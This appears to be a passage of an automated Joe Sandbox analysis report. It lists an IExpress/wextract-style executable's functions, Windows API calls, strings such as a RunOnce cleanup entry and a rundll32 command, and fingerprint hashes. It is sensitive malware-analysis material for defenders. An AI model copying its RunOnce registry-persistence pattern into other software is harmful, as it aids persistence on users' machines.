                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$valid
                                                                                                                                                                                                                                                            • API String ID: 2418873061-700800132
                                                                                                                                                                                                                                                            • Opcode ID: 2d4d735f426fab3c92259764a8aa6384ddc282ab89f4ab43cb63958c7f046cc4
                                                                                                                                                                                                                                                            • Instruction ID: 4f4835f950cfc927ecc16e22ea10a6fa26cb2383dea10649f5d2e4dc575a498e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d4d735f426fab3c92259764a8aa6384ddc282ab89f4ab43cb63958c7f046cc4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851F530341EB0B7E7316B757C4DFFB298B9B86B54F104128F645967D1CBA88B039A61
                                                                                                                                                                                                                                                            Function 006234F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000), ref: 00623535
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00623541
                                                                                                                                                                                                                                                            • ResetEvent.KERNEL32 ref: 0062355F
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00621140,00000000,00000020,00000004), ref: 00623590
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 006235C7
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 006235F1
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 006235F8
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,0000083B), ref: 00623610
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00623617
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00623623
                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00628798), ref: 00623637
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00623671
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 2406144884-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: 4ec27aa70f8fbbe61b23360c7f4e08f8902e77fc324801446b78ff01fd3c2efa
                                                                                                                                                                                                                                                            • Instruction ID: 11017d273a5db06f7644a81b16a54c5e5ec83f343d8d078daccf7bea43f68705
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ec27aa70f8fbbe61b23360c7f4e08f8902e77fc324801446b78ff01fd3c2efa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E631E370200F31BBD7301F65FC4DE6A3A6BE785B50F149529F602A63A0CBB98A12CF55
                                                                                                                                                                                                                                                            Function 00624224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00624236
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0062424C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00624263
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0062427A
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,006288C0,?,00000001), ref: 0062429F
                                                                                                                                                                                                                                                            • CharPrevA.USER32(006288C0,00C51181,?,00000001), ref: 006242C2
                                                                                                                                                                                                                                                            • CharPrevA.USER32(006288C0,00000000,?,00000001), ref: 006242D6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00624391
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 006243A5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                            • Opcode ID: f0e989fdda840bca7d56c27eb8927b76916db76eecdb7ac9f783a333b7a07419
                                                                                                                                                                                                                                                            • Instruction ID: b5aedd3c37a0111c66e2a00094e97a2e2a26f26af42b405b190f96605542398a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0e989fdda840bca7d56c27eb8927b76916db76eecdb7ac9f783a333b7a07419
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9411974A01A20AFD7219FB1FC889AD7BB7EB49344F044159E901A7392CF748D02CF61
                                                                                                                                                                                                                                                            Function 006244B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 006245A3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 006245E3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 0062460D
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00624630
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,valid,00000000), ref: 00624666
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0062466F
                                                                                                                                                                                                                                                              • Part of subcall function 0062681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0062686E
                                                                                                                                                                                                                                                              • Part of subcall function 0062681F: GetSystemMetrics.USER32(0000004A), ref: 006268A7
                                                                                                                                                                                                                                                              • Part of subcall function 0062681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 006268CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062681F: RegQueryValueExA.ADVAPI32(?,00621140,00000000,?,?,?), ref: 006268F4
                                                                                                                                                                                                                                                              • Part of subcall function 0062681F: RegCloseKey.ADVAPI32(?), ref: 00626902
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$valid
                                                                                                                                                                                                                                                            • API String ID: 3244514340-303183264
                                                                                                                                                                                                                                                            • Opcode ID: 37cc23619693a44364c44b43d728b90de33ae224138643465f358ffb3956f814
                                                                                                                                                                                                                                                            • Instruction ID: 9e03a502b258893a2b8f9ebd80a7ae2ccfc66eda851968346065e5c28ec5243e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37cc23619693a44364c44b43d728b90de33ae224138643465f358ffb3956f814
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61510471900A259BDB219F68EC48BEA7B6BEF45300F144194FD49B7241DF719E06CF60
                                                                                                                                                                                                                                                            Function 00622773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CharUpperA.USER32(AE0315E4,00000000,00000000,00000000), ref: 006227A8
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 006227B5
                                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 006227BC
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622829
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00621140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622852
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00622870
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 006228A0
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 006228AA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(-00000005,00000104), ref: 006228B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 006227E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                            • Opcode ID: 59f36988436eacaed928c967c84a6a9f4d588d9ef38900723b9b361cf2483cd3
                                                                                                                                                                                                                                                            • Instruction ID: 29e543621563e62f30157585262717a02c26f8f827dab26370d8a2e4171275de
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59f36988436eacaed928c967c84a6a9f4d588d9ef38900723b9b361cf2483cd3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB41B671E0053CAFDB249F64EC55AEA77BEEF55700F0040A9F545D2210DBB48E868FA5
                                                                                                                                                                                                                                                            Function 00622267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 006222A3
                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 006222D8
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 006222F5
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00622305
                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?), ref: 0062236E
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0062237A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00622321
                                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0062232D
                                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00622299
                                                                                                                                                                                                                                                            • wextract_cleanup1, xrefs: 0062227C, 006222CD, 00622363
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                                                                            • API String ID: 3027380567-2601155950
                                                                                                                                                                                                                                                            • Opcode ID: 2edb03837902202714d4ddabf99cd68d5ecfeb8bf8b9e8bcd7d1004fee4e5582
                                                                                                                                                                                                                                                            • Instruction ID: f7ba7e40ea78bea1dfe05bbd627ee1552f08a9cea3045471a1bbd543b85df533
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2edb03837902202714d4ddabf99cd68d5ecfeb8bf8b9e8bcd7d1004fee4e5582
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4231E571A00628ABCB71DB50EC49FEA7B7EEF54744F0001A9B50DAA050EA70AF89CE50
                                                                                                                                                                                                                                                            Function 00623100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 0062313B
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0062314B
                                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000834), ref: 0062316A
                                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,valid), ref: 00623176
                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0062317D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000834), ref: 00623185
                                                                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000FC), ref: 00623190
                                                                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000FC,006230C0), ref: 006231A3
                                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 006231CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                            • String ID: valid
                                                                                                                                                                                                                                                            • API String ID: 3785188418-2349282815
                                                                                                                                                                                                                                                            • Opcode ID: 8a34119f34742d2e01c7a2a28266a493eec11f2d29647028a6f349d4b707de9f
                                                                                                                                                                                                                                                            • Instruction ID: ab0b46869a652e1b987c25f5348f58af3189eeb0398b1a85531c0842b16fafac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a34119f34742d2e01c7a2a28266a493eec11f2d29647028a6f349d4b707de9f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F11A231205A35BFDB215B64BC0CB9A3A67FB46720F105610F915A23E0DBB98762CE92
                                                                                                                                                                                                                                                            Function 006218A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 006217EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,006218DD), ref: 0062181A
                                                                                                                                                                                                                                                              • Part of subcall function 006217EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0062182C
                                                                                                                                                                                                                                                              • Part of subcall function 006217EE: AllocateAndInitializeSid.ADVAPI32(006218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,006218DD), ref: 00621855
                                                                                                                                                                                                                                                              • Part of subcall function 006217EE: FreeSid.ADVAPI32(?,?,?,?,006218DD), ref: 00621883
                                                                                                                                                                                                                                                              • Part of subcall function 006217EE: FreeLibrary.KERNEL32(00000000,?,?,?,006218DD), ref: 0062188A
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 006218EB
                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 006218F2
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0062190A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00621918
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 0062192C
                                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00621944
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00621964
                                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 0062197A
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 0062199C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 006219A3
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 006219AD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                                            • Opcode ID: 47322d3d6f4ea0133d5d4f4b6b9e1a6810902ab540c95e22e0b1375185951d31
                                                                                                                                                                                                                                                            • Instruction ID: 81211b4b3d64c1dae01bc39c320903d4e0ac6b3c4143982abdf5f3659580abbe
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47322d3d6f4ea0133d5d4f4b6b9e1a6810902ab540c95e22e0b1375185951d31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8316B71E00A1AAFDB209FE5EC48AAFBBBAFB19304B101429E541D6150D7709946CB22
                                                                                                                                                                                                                                                            Function 006217EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71librarymemoryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,006218DD), ref: 0062181A
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0062182C
                                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(006218DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,006218DD), ref: 00621855
                                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,006218DD), ref: 00621883
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,006218DD), ref: 0062188A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                            • Opcode ID: e2b4da78da7f41623694d738a0ca29ec8be27ee19aef9ea018bee18dea1924ba
                                                                                                                                                                                                                                                            • Instruction ID: 93564f8ebc6fba334a6a89c15a2dc04b6de83257b24cd4877f2d08e52af29249
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2b4da78da7f41623694d738a0ca29ec8be27ee19aef9ea018bee18dea1924ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6811B631E00619AFDB109FE4EC4AABEBB7AEF45744F110169FA01E7390DB708D018B91
                                                                                                                                                                                                                                                            Function 00622AAC Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00622AE6
                                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00622AF2
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00622B12
                                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00622B1E
                                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00622B55
                                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00622BD4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                                            • Opcode ID: b878afcfdc550dd4a2b3f5e8674f5c278bc82412a237186981277163f8731c19
                                                                                                                                                                                                                                                            • Instruction ID: ccfebc0e079c9b56bf9bcc9e536d228fb04aa4a1ec1f39fe096f0dbd5ae7d235
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b878afcfdc550dd4a2b3f5e8674f5c278bc82412a237186981277163f8731c19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00412434108A666FDB259F30AC64AFD7BAB9F52315F04009AE8C287202DB754E87CF61
                                                                                                                                                                                                                                                            Function 006228E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140memoryCOMMON
